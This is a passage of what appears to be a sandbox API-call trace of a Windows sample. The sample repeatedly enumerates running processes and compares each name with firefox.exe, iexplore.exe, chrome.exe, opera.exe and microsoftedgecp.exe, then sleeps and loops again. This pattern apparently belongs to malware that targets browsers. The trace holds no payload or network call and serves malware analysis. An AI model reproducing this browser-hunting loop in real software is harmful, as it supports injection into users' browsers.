cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0257.037] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0257.037] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0257.038] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0257.038] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0257.038] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0257.038] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0257.038] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0257.038] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0257.038] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0257.038] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0257.039] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0257.039] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0257.039] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0257.039] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0257.039] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.039] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0257.039] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0257.039] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0257.039] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0257.039] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0257.039] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.039] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0257.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0257.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0257.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0257.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0257.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0257.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0257.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0257.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0257.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0257.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0257.041] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0257.041] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0257.041] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0257.041] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0257.041] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0257.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0257.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0257.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0257.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0257.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.042] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0257.042] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0257.042] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0257.042] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0257.042] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0257.042] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.042] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0257.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0257.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0257.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0257.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0257.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0257.043] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0257.043] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0257.043] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0257.043] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0257.043] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0257.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0257.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0257.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0257.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0257.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.044] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0257.044] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0257.044] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0257.044] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0257.045] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0257.045] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.045] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0257.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0257.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0257.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0257.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0257.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.045] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0257.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0257.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0257.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0257.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0257.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.046] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0257.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0257.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0257.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0257.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0257.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.046] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0257.047] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0257.047] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0257.047] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0257.047] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0257.047] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.047] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0257.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0257.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0257.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0257.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.047] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.048] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.048] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.048] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.048] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.048] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.048] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0257.048] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0257.049] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0257.049] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0257.049] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0257.049] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.049] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.049] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.049] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.049] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.049] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.049] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.049] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0257.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0257.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0257.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0257.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.050] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.050] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.050] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.050] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.050] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0257.050] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.051] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0257.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0257.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0257.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0257.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0257.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.051] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0257.052] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0257.053] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0257.054] CloseHandle (hObject=0xe8) returned 1 [0257.054] Sleep (dwMilliseconds=0x3e8) [0258.087] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0258.088] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.089] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0258.089] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0258.089] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0258.089] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0258.089] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0258.089] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.089] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0258.090] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0258.090] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0258.090] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0258.090] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0258.090] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.090] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0258.090] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0258.090] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0258.090] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0258.090] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.090] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.091] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0258.091] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0258.091] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0258.091] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0258.091] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.091] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.091] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0258.091] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0258.091] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0258.091] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0258.091] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.091] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.092] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0258.092] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0258.092] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0258.092] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0258.092] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.092] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.092] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0258.092] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0258.092] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0258.092] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0258.093] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.093] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.093] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0258.093] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0258.093] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0258.093] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0258.093] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.093] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, 